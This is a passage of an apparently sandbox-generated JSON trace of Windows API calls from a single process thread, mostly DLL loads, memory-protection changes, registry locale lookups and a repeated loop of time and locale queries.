"thread_id": "3892", "caller": "0x764e0bbf", "parentcaller": "0x756a23ad", "category": "system", "api": "LdrGetDllHandle", "status": false, "return": "0xffffffffc0000135", "pretty_return": "DLL_NOT_FOUND", "arguments": [ { "name": "FileName", "value": "iertutil.dll" }, { "name": "ModuleHandle", "value": "0x731795f6" } ], "repeated": 0, "id": 688 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x77190947", "parentcaller": "0x7719064f", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x00742000" }, { "name": "RegionSize", "value": "0x00002000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 689 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x764e108f", "parentcaller": "0x75685925", "category": "synchronization", "api": "NtOpenEvent", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "Handle", "value": "0x00000000" }, { "name": "EventName", "value": "Local\\1ImmersiveFocusTrackingActiveEvent" } ], "repeated": 0, "id": 690 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x7567668d", "parentcaller": "0x756788ed", "category": "misc", "api": "GetKeyboardLayout", "status": true, "return": "0x040a0c0a", "arguments": [ { "name": "KeyboardLayout", "value": "0x00000c0a" }, { "name": "LanguageName", "value": "Spanish (Spain)" } ], "repeated": 1, "id": 691 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x764e0bbf", "parentcaller": "0x76641956", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "USER32" }, { "name": "ModuleHandle", "value": "0x76610000" } ], "repeated": 0, "id": 692 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x7718940b", "parentcaller": "0x77189837", "category": "filesystem", "api": "NtOpenFile", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "FileHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00100001", "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\SystemResources\\USER32.dll.mun" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 1, "id": 693 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x73219865", "parentcaller": "0x732193c5", "category": "windows", "api": "PostMessageA", "status": true, "return": "0x00000001", "arguments": [ { "name": "WindowHandle", "value": "0x00160448" }, { "name": "Message", "value": "0x0000100e" } ], "repeated": 1, "id": 694 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x764e1c36", "parentcaller": "0x7664ffe1", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "C:\\Windows\\System32\\msctf.dll" }, { "name": "BaseAddress", "value": "0x75650000" } ], "repeated": 0, "id": 695 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "windows", "api": "PostMessageA", "status": true, "return": "0x00000001", "arguments": [ { "name": "WindowHandle", "value": "0x00160448" }, { "name": "Message", "value": "0x0000105a" } ], "repeated": 0, "id": 696 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "windows", "api": "PostThreadMessageA", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessId", "value": "9224" }, { "name": "ThreadId", "value": "3892" }, { "name": "Message", "value": "4201" } ], "repeated": 0, "id": 697 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x7650b8ba", "parentcaller": "0x738f9e6f", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x73924000" }, { "name": "ModuleName", "value": "CoreMessaging.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 698 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x764f956a", "parentcaller": "0x738fa13a", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "" }, { "name": "Ordinal", "value": "2541" }, { "name": "FunctionAddress", "value": "0x76652440" } ], "repeated": 0, "id": 699 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x7650b8ba", "parentcaller": "0x738f9e6f", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x73924000" }, { "name": "ModuleName", "value": "CoreMessaging.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 700 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x7650b8ba", "parentcaller": "0x738f9e6f", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x73924000" }, { "name": "ModuleName", "value": "CoreMessaging.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 701 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x764f956a", "parentcaller": "0x738fa13a", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "" }, { "name": "Ordinal", "value": "2613" }, { "name": "FunctionAddress", "value": "0x76650c80" } ], "repeated": 0, "id": 702 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x7650b8ba", "parentcaller": "0x738f9e6f", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x73924000" }, { "name": "ModuleName", "value": "CoreMessaging.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 703 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x7650b8ba", "parentcaller": "0x738f9e6f", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x73924000" }, { "name": "ModuleName", "value": "CoreMessaging.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 704 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x764f956a", "parentcaller": "0x738fa13a", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "PostMessageW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76645f00" } ], "repeated": 0, "id": 705 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x7650b8ba", "parentcaller": "0x738f9e6f", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x73924000" }, { "name": "ModuleName", "value": "CoreMessaging.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 706 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x738dce74", "parentcaller": "0x738f2547", "category": "windows", "api": "PostMessageW", "status": true, "return": "0x00000001", "arguments": [ { "name": "WindowHandle", "value": "0x001f0440" }, { "name": "Message", "value": "0x00000060" } ], "repeated": 0, "id": 707 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x004032a0", "parentcaller": "0x00000000", "category": "system", "api": "GetUserDefaultLCID", "status": true, "return": "0x00000c0a", "arguments": [ { "name": "SystemDefaultLangID", "value": "0x00000c0a" }, { "name": "LanguageName", "value": "Spanish (Spain)" } ], "repeated": 1, "id": 708 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x004032a0", "parentcaller": "0x00000000", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 709 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x004032a0", "parentcaller": "0x00000000", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00000009", "pretty_value": "KEY_QUERY_VALUE|KEY_ENUMERATE_SUB_KEYS" }, { "name": "ObjectAttributesHandle", "value": "0x00000124" }, { "name": "ObjectAttributesName", "value": "SOFTWARE\\Microsoft\\OLEAUT\\UserEra" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\OLEAUT\\UserEra" } ], "repeated": 0, "id": 710 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x004032a0", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 711 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x004032a0", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetCalendarInfoW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758838b0" } ], "repeated": 0, "id": 712 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x004032a0", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\xf0\\xe7\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\xcc\\xe7\\x19\\x00@\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x130U\\xa7\\xfb}\\xdb\\x01\\xbd,\\xa4on\\x83\\xdb\\x01" } ], "repeated": 0, "id": 713 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x004032a0", "parentcaller": "0x00000000", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000344" }, { "name": "DesiredAccess", "value": "0x02000000", "pretty_value": "MAXIMUM_ALLOWED" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\REGISTRY\\USER\\S-1-5-21-2901619373-3413834416-3107304870-1001" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER" } ], "repeated": 0, "id": 714 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x004032a0", "parentcaller": "0x00000000", "category": "registry", "api": "NtOpenKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000344" }, { "name": "ObjectAttributesName", "value": "Software\\Policies\\Microsoft\\Control Panel\\International\\Calendars\\TwoDigitYearMax" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Control Panel\\International\\Calendars\\TwoDigitYearMax" } ], "repeated": 0, "id": 715 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x004032a0", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000344" } ], "repeated": 0, "id": 716 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x004032a0", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\xf0\\xe7\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00P\\xe8\\x19\\x00\\xdb\\x9e6s \\xccTs$\\xb6\\s\\xfc\\x91\\x7f\\x02H\\xd4Ws\\xa0\\xe8\\x19\\x00\\x00\\x00\\x1a\\x008\\x15!s\\x10\\xe8\\x19\\x00\\x8f\\x028s" } ], "repeated": 0, "id": 717 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x004032a0", "parentcaller": "0x00000000", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000344" }, { "name": "DesiredAccess", "value": "0x02000000", "pretty_value": "MAXIMUM_ALLOWED" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\REGISTRY\\USER\\S-1-5-21-2901619373-3413834416-3107304870-1001" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER" } ], "repeated": 0, "id": 718 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x004032a0", "parentcaller": "0x00000000", "category": "registry", "api": "NtOpenKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000344" }, { "name": "ObjectAttributesName", "value": "Control Panel\\International\\Calendars\\TwoDigitYearMax" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Control Panel\\International\\Calendars\\TwoDigitYearMax" } ], "repeated": 0, "id": 719 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x004032a0", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000344" } ], "repeated": 0, "id": 720 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x004032a0", "parentcaller": "0x00000000", "category": "system", "api": "GetLocalTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 721 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x0041212d", "parentcaller": "0x004032a0", "category": "system", "api": "GetUserDefaultLCID", "status": true, "return": "0x00000c0a", "arguments": [ { "name": "SystemDefaultLangID", "value": "0x00000c0a" }, { "name": "LanguageName", "value": "Spanish (Spain)" } ], "repeated": 2, "id": 722 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x004032a0", "parentcaller": "0x004032a0", "category": "system", "api": "GetLocalTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 723 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x0041212d", "parentcaller": "0x004032a0", "category": "system", "api": "GetUserDefaultLCID", "status": true, "return": "0x00000c0a", "arguments": [ { "name": "SystemDefaultLangID", "value": "0x00000c0a" }, { "name": "LanguageName", "value": "Spanish (Spain)" } ], "repeated": 2, "id": 724 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x004032a0", "parentcaller": "0x004032a0", "category": "system", "api": "GetLocalTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 725 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x0041212d", "parentcaller": "0x004032a0", "category": "system", "api": "GetUserDefaultLCID", "status": true, "return": "0x00000c0a", "arguments": [ { "name": "SystemDefaultLangID", "value": "0x00000c0a" }, { "name": "LanguageName", "value": "Spanish (Spain)" } ], "repeated": 2, "id": 726 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x004032a0", "parentcaller": "0x004032a0", "category": "system", "api": "GetLocalTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 727 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x0041212d", "parentcaller": "0x004032a0", "category": "system", "api": "GetUserDefaultLCID", "status": true, "return": "0x00000c0a", "arguments": [ { "name": "SystemDefaultLangID", "value": "0x00000c0a" }, { "name": "LanguageName", "value": "Spanish (Spain)" } ], "repeated": 2, "id": 728 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x004032a0", "parentcaller": "0x004032a0", "category": "system", "api": "GetLocalTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 729 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x0041212d", "parentcaller": "0x004032a0", "category": "system", "api": "GetUserDefaultLCID", "status": true, "return": "0x00000c0a", "arguments": [ { "name": "SystemDefaultLangID", "value": "0x00000c0a" }, { "name": "LanguageName", "value": "Spanish (Spain)" } ], "repeated": 2, "id": 730 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x004032a0", "parentcaller": "0x004032a0", "category": "system", "api": "GetLocalTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 731 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x0041212d", "parentcaller": "0x004032a0", "category": "system", "api": "GetUserDefaultLCID", "status": true, "return": "0x00000c0a", "arguments": [ { "name": "SystemDefaultLangID", "value": "0x00000c0a" }, { "name": "LanguageName", "value": "Spanish (Spain)" } ], "repeated": 2, "id": 732 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x004032a0", "parentcaller": "0x004032a0", "category": "system", "api": "GetLocalTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 733 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x0041212d", "parentcaller": "0x004032a0", "category": "system", "api": "GetUserDefaultLCID", "status": true, "return": "0x00000c0a", "arguments": [ { "name": "SystemDefaultLangID", "value": "0x00000c0a" }, { "name": "LanguageName", "value": "Spanish (Spain)" } ], "repeated": 2, "id": 734 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x004032a0", "parentcaller": "0x004032a0", "category": "system", "api": "GetLocalTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 735 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x0041212d", "parentcaller": "0x004032a0", "category": "system", "api": "GetUserDefaultLCID", "status": true, "return": "0x00000c0a", "arguments": [ { "name": "SystemDefaultLangID", "value": "0x00000c0a" }, { "name": "LanguageName", "value": "Spanish (Spain)" } ], "repeated": 2, "id": 736 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x004032a0", "parentcaller": "0x004032a0", "category": "system", "api": "GetLocalTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 737 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x0041212d", "parentcaller": "0x004032a0", "category": "system", "api": "GetUserDefaultLCID", "status": true, "return": "0x00000c0a", "arguments": [ { "name": "SystemDefaultLangID", "value": "0x00000c0a" }, { "name": "LanguageName", "value": "Spanish (Spain)" } ], "repeated": 2, "id": 738 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x004032a0", "parentcaller": "0x004032a0", "category": "system", "api": "GetLocalTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 739 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x0041212d", "parentcaller": "0x004032a0", "category": "system", "api": "GetUserDefaultLCID", "status": true, "return": "0x00000c0a", "arguments": [ { "name": "SystemDefaultLangID", "value": "0x00000c0a" }, { "name": "LanguageName", "value": "Spanish (Spain)" } ], "repeated": 2, "id": 740 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x004032a0", "parentcaller": "0x004032a0", "category": "system", "api": "GetLocalTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 741 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x0041212d", "parentcaller": "0x004032a0", "category": "system", "api": "GetUserDefaultLCID", "status": true, "return": "0x00000c0a", "arguments": [ { "name": "SystemDefaultLangID", "value": "0x00000c0a" }, { "name": "LanguageName", "value": "Spanish (Spain)" } ], "repeated": 2, "id": 742 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x004032a0", "parentcaller": "0x004032a0", "category": "system", "api": "GetLocalTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 743 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x0041212d", "parentcaller": "0x004032a0", "category": "system", "api": "GetUserDefaultLCID", "status": true, "return": "0x00000c0a", "arguments": [ { "name": "SystemDefaultLangID", "value": "0x00000c0a" }, { "name": "LanguageName", "value": "Spanish (Spain)" } ], "repeated": 2, "id": 744 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x004032a0", "parentcaller": "0x004032a0", "category": "system", "api": "GetLocalTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 745 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x0041212d", "parentcaller": "0x004032a0", "category": "system", "api": "GetUserDefaultLCID", "status": true, "return": "0x00000c0a", "arguments": [ { "name": "SystemDefaultLangID", "value": "0x00000c0a" }, { "name": "LanguageName", "value": "Spanish (Spain)" } ], "repeated": 2, "id": 746 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x004032a0", "parentcaller": "0x004032a0", "category": "system", "api": "GetLocalTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 747 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x0041212d", "parentcaller": "0x004032a0", "category": "system", "api": "GetUserDefaultLCID", "status": true, "return": "0x00000c0a", "arguments": [ { "name": "SystemDefaultLangID", "value": "0x00000c0a" }, { "name": "LanguageName", "value": "Spanish (Spain)" } ], "repeated": 2, "id": 748 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x004032a0", "parentcaller": "0x004032a0", "category": "system", "api": "GetLocalTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 749 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x0041212d", "parentcaller": "0x004032a0", "category": "system", "api": "GetUserDefaultLCID", "status": true, "return": "0x00000c0a", "arguments": [ { "name": "SystemDefaultLangID", "value": "0x00000c0a" }, { "name": "LanguageName", "value": "Spanish (Spain)" } ], "repeated": 2, "id": 750 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x004032a0", "parentcaller": "0x004032a0", "category": "system", "api": "GetLocalTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 751 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x0041212d", "parentcaller": "0x004032a0", "category": "system", "api": "GetUserDefaultLCID", "status": true, "return": "0x00000c0a", "arguments": [ { "name": "SystemDefaultLangID", "value": "0x00000c0a" }, { "name": "LanguageName", "value": "Spanish (Spain)" } ], "repeated": 2, "id": 752 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x004032a0", "parentcaller": "0x004032a0", "category": "system", "api": "GetLocalTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 753 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x0041212d", "parentcaller": "0x004032a0", "category": "system", "api": "GetUserDefaultLCID", "status": true, "return": "0x00000c0a", "arguments": [ { "name": "SystemDefaultLangID", "value": "0x00000c0a" }, { "name": "LanguageName", "value": "Spanish (Spain)" } ], "repeated": 2, "id": 754 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x004032a0", "parentcaller": "0x004032a0", "category": "system", "api": "GetLocalTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 755 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x0041212d", "parentcaller": "0x004032a0", "category": "system", "api": "GetUserDefaultLCID", "status": true, "return": "0x00000c0a", "arguments": [ { "name": "SystemDefaultLangID", "value": "0x00000c0a" }, { "name": "LanguageName", "value": "Spanish (Spain)" } ], "repeated": 2, "id": 756 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x004032a0", "parentcaller": "0x004032a0", "category": "system", "api": "GetLocalTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 757 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x0041212d", "parentcaller": "0x004032a0", "category": "system", "api": "GetUserDefaultLCID", "status": true, "return": "0x00000c0a", "arguments": [ { "name": "SystemDefaultLangID", "value": "0x00000c0a" }, { "name": "LanguageName", "value": "Spanish (Spain)" } ], "repeated": 2, "id": 758 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x004032a0", "parentcaller": "0x004032a0", "category": "system", "api": "GetLocalTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 759 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x0041212d", "parentcaller": "0x004032a0", "category": "system", "api": "GetUserDefaultLCID", "status": true, "return": "0x00000c0a", "arguments": [ { "name": "SystemDefaultLangID", "value": "0x00000c0a" }, { "name": "LanguageName", "value": "Spanish (Spain)" } ], "repeated": 2, "id": 760 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x004032a0", "parentcaller": "0x004032a0", "category": "system", "api": "GetLocalTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 761 }, { "timestamp": "2025-02-27 23:34:15,987", "thread_id": "3892", "caller": "0x0041212d", "parentcaller": "0x004032a0", "category": "system", "api": "GetUserDefaultLCID", "status": true, "return": "0x00000c0a", "arguments": [ { "name": "SystemDefaultLangID", "value": "0x00000c0a" }, { "name": "LanguageName", "value": "Spanish (Spain)" } ], "repeated": 2, "id": 762 }, { "timestamp": "2025-02-27 23:34:15,987", 